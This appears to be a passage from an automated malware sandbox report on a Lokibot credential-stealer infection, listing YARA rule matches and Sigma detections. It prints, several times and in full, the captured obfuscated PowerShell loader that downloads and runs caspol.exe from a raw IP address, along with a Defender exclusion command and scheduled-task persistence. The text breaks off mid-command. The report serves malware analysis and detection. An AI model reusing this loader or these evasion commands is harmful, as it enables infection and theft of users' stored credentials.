31.2.rrwscqkDSNwLK.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
31.2.rrwscqkDSNwLK.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
11.2.caspol.exe.36cfc30.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.caspol.exe.36cfc30.4.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.caspol.exe.36cfc30.4.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.caspol.exe.36cfc30.4.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
11.2.caspol.exe.36cfc30.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.caspol.exe.36e9c50.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.caspol.exe.36e9c50.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.caspol.exe.36e9c50.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.caspol.exe.36e9c50.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
11.2.caspol.exe.36e9c50.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.caspol.exe.36cfc30.4.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
11.2.caspol.exe.36cfc30.4.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.caspol.exe.36cfc30.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.caspol.exe.36cfc30.4.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.caspol.exe.36cfc30.4.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.caspol.exe.36cfc30.4.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
11.2.caspol.exe.36cfc30.4.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.caspol.exe.36cfc30.4.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
11.2.caspol.exe.36e9c50.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
11.2.caspol.exe.36e9c50.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.caspol.exe.36e9c50.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.caspol.exe.36e9c50.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.caspol.exe.36e9c50.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.caspol.exe.36e9c50.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
11.2.caspol.exe.36e9c50.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.caspol.exe.36e9c50.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
Click to see the 37 entries

Sigma Signatures

System Summary

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3400, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3064, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe", ProcessId: 1888, ProcessName: powershell.exe

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))", CommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwY

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3400, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3644, ProcessName: mshta.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment, CommandLine|base64offset|contains: E, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment, ProcessId: 3896, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3756, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline", ProcessId: 3992, ProcessName: csc.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 198.244.140.41, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3400, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3756, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\caspol.exe", ParentImage: C:\Users\user\AppData\Roaming\caspol.exe, ParentProcessId: 3064, ParentProcessName: caspol.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp", ProcessId: 1392, ProcessName: schtasks.exe

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3400, Protocol: tcp, SourceIp: 198.244.140.41, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3756, TargetFilename: C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3400, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVl